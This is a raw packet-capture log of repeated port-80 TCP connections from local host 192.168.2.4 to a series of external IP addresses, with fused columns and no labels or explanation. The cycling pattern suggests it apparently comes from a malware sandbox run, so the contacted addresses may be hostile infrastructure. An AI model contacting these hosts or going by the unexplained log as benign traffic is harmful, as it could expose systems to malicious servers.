                                                                                              Apr 24, 2024 07:27:32.482213020 CEST8049758217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:32.482235909 CEST8049758217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:32.482263088 CEST4975880192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:32.482300043 CEST4975880192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:33.684365034 CEST4975880192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:34.704581022 CEST4975980192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:35.008347988 CEST8049759217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:35.008744001 CEST4975980192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:35.011996031 CEST4975980192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:35.315548897 CEST8049759217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:35.320136070 CEST8049759217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:35.320178986 CEST8049759217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:35.320220947 CEST8049759217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:35.320230007 CEST4975980192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:35.320278883 CEST4975980192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:36.512599945 CEST4975980192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:38.019752026 CEST4976080192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:38.327588081 CEST8049760217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:38.327697039 CEST4976080192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:38.330450058 CEST4976080192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:38.638184071 CEST8049760217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:38.638227940 CEST8049760217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:38.638252020 CEST8049760217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:38.638276100 CEST8049760217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:38.638376951 CEST8049760217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:38.638508081 CEST8049760217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:38.638837099 CEST8049760217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:38.638926029 CEST8049760217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:38.638948917 CEST8049760217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:38.641844988 CEST8049760217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:38.641876936 CEST8049760217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:38.641952991 CEST8049760217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:38.641958952 CEST4976080192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:38.641992092 CEST4976080192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:39.840686083 CEST4976080192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:40.861572981 CEST4976180192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:41.166768074 CEST8049761217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:41.166877031 CEST4976180192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:41.169056892 CEST4976180192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:41.474618912 CEST8049761217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:41.479784966 CEST8049761217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:41.479814053 CEST8049761217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:41.479831934 CEST8049761217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:41.479857922 CEST8049761217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:41.480855942 CEST4976180192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:41.481734037 CEST8049761217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:41.485531092 CEST4976180192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:41.485531092 CEST4976180192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:41.790482998 CEST8049761217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:46.991964102 CEST4976280192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:47.296504021 CEST804976264.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:47.296717882 CEST4976280192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:47.299001932 CEST4976280192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:47.604283094 CEST804976264.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:47.604312897 CEST804976264.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:47.604928970 CEST4976280192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:48.809452057 CEST4976280192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:49.829121113 CEST4976380192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:50.136183023 CEST804976364.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:50.136435032 CEST4976380192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:50.139935970 CEST4976380192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:50.449489117 CEST804976364.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:50.449516058 CEST804976364.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:50.449768066 CEST4976380192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:51.654804945 CEST4976380192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:52.673008919 CEST4976480192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:52.977544069 CEST804976464.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:52.977629900 CEST4976480192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:52.980545998 CEST4976480192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:53.285142899 CEST804976464.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:53.285162926 CEST804976464.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:53.285173893 CEST804976464.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:53.285185099 CEST804976464.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:53.285219908 CEST804976464.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:53.285307884 CEST804976464.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:53.285751104 CEST804976464.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:53.285814047 CEST804976464.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:53.285898924 CEST4976480192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:55.471735954 CEST4976480192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:56.487540960 CEST4976580192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:56.795192957 CEST804976564.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:56.797032118 CEST4976580192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:56.800787926 CEST4976580192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:57.134358883 CEST804976564.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:57.134382963 CEST804976564.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:57.134408951 CEST804976564.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:57.134422064 CEST804976564.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:57.134483099 CEST4976580192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:57.134483099 CEST4976580192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:57.134497881 CEST804976564.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:57.134512901 CEST804976564.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:57.134560108 CEST4976580192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:57.134588003 CEST804976564.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:57.134602070 CEST804976564.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:57.134722948 CEST804976564.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:57.134736061 CEST804976564.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:57.134773970 CEST4976580192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:57.441720963 CEST804976564.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:57.441782951 CEST804976564.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:57.441823006 CEST804976564.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:57.441859007 CEST804976564.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:57.441864014 CEST4976580192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:57.441916943 CEST804976564.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:57.441926003 CEST4976580192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:57.442157030 CEST804976564.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:57.442197084 CEST804976564.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:57.442230940 CEST4976580192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:57.442311049 CEST804976564.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:27:57.442440987 CEST4976580192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:57.444792032 CEST4976580192.168.2.464.190.62.22
                                                                                              Apr 24, 2024 07:27:57.752144098 CEST804976564.190.62.22192.168.2.4
                                                                                              Apr 24, 2024 07:28:02.835455894 CEST4976680192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:03.110378027 CEST8049766118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:03.110528946 CEST4976680192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:03.112780094 CEST4976680192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:03.386794090 CEST8049766118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:03.388254881 CEST8049766118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:03.388303041 CEST8049766118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:03.388443947 CEST4976680192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:04.621823072 CEST4976680192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:05.642787933 CEST4976780192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:05.901422977 CEST8049767118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:05.901504040 CEST4976780192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:05.904124022 CEST4976780192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:06.162818909 CEST8049767118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:06.164176941 CEST8049767118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:06.164216042 CEST8049767118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:06.164268017 CEST4976780192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:07.418659925 CEST4976780192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:08.469079971 CEST4976880192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:08.734160900 CEST8049768118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:08.736939907 CEST4976880192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:08.740825891 CEST4976880192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:09.007213116 CEST8049768118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:09.007246971 CEST8049768118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:09.007266045 CEST8049768118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:09.007585049 CEST8049768118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:09.007726908 CEST8049768118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:09.007740974 CEST8049768118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:09.007755041 CEST8049768118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:09.007770061 CEST8049768118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:09.007882118 CEST8049768118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:09.008766890 CEST8049768118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:09.008785009 CEST8049768118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:09.008882046 CEST4976880192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:10.246915102 CEST4976880192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:11.266798973 CEST4976980192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:11.540838003 CEST8049769118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:11.540919065 CEST4976980192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:11.543102026 CEST4976980192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:11.817044973 CEST8049769118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:11.818558931 CEST8049769118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:11.818639040 CEST8049769118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:11.818725109 CEST4976980192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:11.821577072 CEST4976980192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:12.095594883 CEST8049769118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:17.139041901 CEST4977080192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:17.308581114 CEST804977034.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:17.308729887 CEST4977080192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:17.312788010 CEST4977080192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:17.482171059 CEST804977034.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:17.518404961 CEST804977034.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:17.518434048 CEST804977034.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:17.520133972 CEST4977080192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:18.825050116 CEST4977080192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:19.843231916 CEST4977180192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:20.013865948 CEST804977134.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:20.013988018 CEST4977180192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:20.015732050 CEST4977180192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:20.185889959 CEST804977134.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:20.231172085 CEST804977134.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:20.231571913 CEST804977134.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:20.231617928 CEST4977180192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:21.528151035 CEST4977180192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:22.549247026 CEST4977280192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:22.719080925 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.719192028 CEST4977280192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:22.721571922 CEST4977280192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:22.891149998 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.891194105 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.891210079 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.891225100 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.891241074 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.892364979 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.892426014 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.892517090 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.892582893 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.926213980 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.926238060 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.926374912 CEST4977280192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:24.231215954 CEST4977280192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:25.249948025 CEST4977380192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:25.419554949 CEST804977334.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:25.419754028 CEST4977380192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:25.424794912 CEST4977380192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:25.594963074 CEST804977334.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:25.682203054 CEST804977334.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:25.682255030 CEST804977334.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:25.682342052 CEST804977334.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:25.682379961 CEST804977334.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:25.682404995 CEST4977380192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:25.682420015 CEST804977334.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:25.682468891 CEST4977380192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:25.682468891 CEST4977380192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:25.687625885 CEST4977380192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:25.857009888 CEST804977334.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:31.825392008 CEST4977480192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:32.182847023 CEST804977431.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:32.183079958 CEST4977480192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:32.187218904 CEST4977480192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:32.544298887 CEST804977431.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:32.545361042 CEST804977431.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:32.545398951 CEST804977431.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:32.545527935 CEST4977480192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:33.699917078 CEST4977480192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:34.718353033 CEST4977580192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:35.075207949 CEST804977531.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:35.075288057 CEST4977580192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:35.078109980 CEST4977580192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:35.435009003 CEST804977531.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:35.435842991 CEST804977531.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:35.435882092 CEST804977531.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:35.435986042 CEST4977580192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:36.591090918 CEST4977580192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:37.610446930 CEST4977680192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:37.965044975 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:37.967758894 CEST4977680192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:37.980017900 CEST4977680192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:38.334358931 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.334434032 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.334466934 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.334500074 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.334532976 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.334655046 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.334705114 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.335210085 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.335297108 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.336600065 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.336637974 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.336791039 CEST4977680192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:39.496861935 CEST4977680192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:40.516792059 CEST4977780192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:40.870302916 CEST804977731.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:40.870398045 CEST4977780192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:40.873035908 CEST4977780192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:41.226131916 CEST804977731.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:41.227427959 CEST804977731.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:41.227471113 CEST804977731.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:41.227560043 CEST4977780192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:41.229969978 CEST4977780192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:41.583481073 CEST804977731.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:46.495013952 CEST4977880192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:46.799424887 CEST804977891.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:46.799520016 CEST4977880192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:46.802004099 CEST4977880192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:47.119467974 CEST804977891.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:47.119534969 CEST804977891.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:47.119580030 CEST4977880192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:48.309361935 CEST4977880192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:49.327888966 CEST4977980192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:49.632491112 CEST804977991.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:49.633090019 CEST4977980192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:49.635121107 CEST4977980192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:49.940563917 CEST804977991.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:49.940594912 CEST804977991.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:49.940711975 CEST4977980192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:51.137432098 CEST4977980192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:52.161462069 CEST4978080192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:52.466085911 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.466267109 CEST4978080192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:52.470910072 CEST4978080192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:52.775405884 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.775779009 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.775796890 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.775811911 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.775830030 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.775844097 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.775859118 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.775872946 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.775887966 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.778855085 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.778884888 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.778929949 CEST4978080192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:53.981200933 CEST4978080192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:55.000251055 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:55.305001974 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.305090904 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:55.307064056 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:55.652690887 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.969573975 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.969628096 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.969669104 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.969687939 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:55.969707966 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.969748020 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.969786882 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.969818115 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:55.969851017 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:55.969913006 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.969952106 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.969989061 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.970030069 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.970057964 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:55.973201036 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:56.274682999 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:56.274739981 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:56.274787903 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:56.274821997 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:56.274827003 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:56.274864912 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:56.274883032 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:56.274991989 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:56.275034904 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:56.275048971 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:56.275078058 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:56.275178909 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:56.275187969 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:56.275433064 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:56.279170990 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:56.583774090 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:29:18.083937883 CEST4978280192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:29:18.388415098 CEST804978291.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:29:18.388492107 CEST4978280192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:29:18.390719891 CEST4978280192.168.2.491.195.240.19
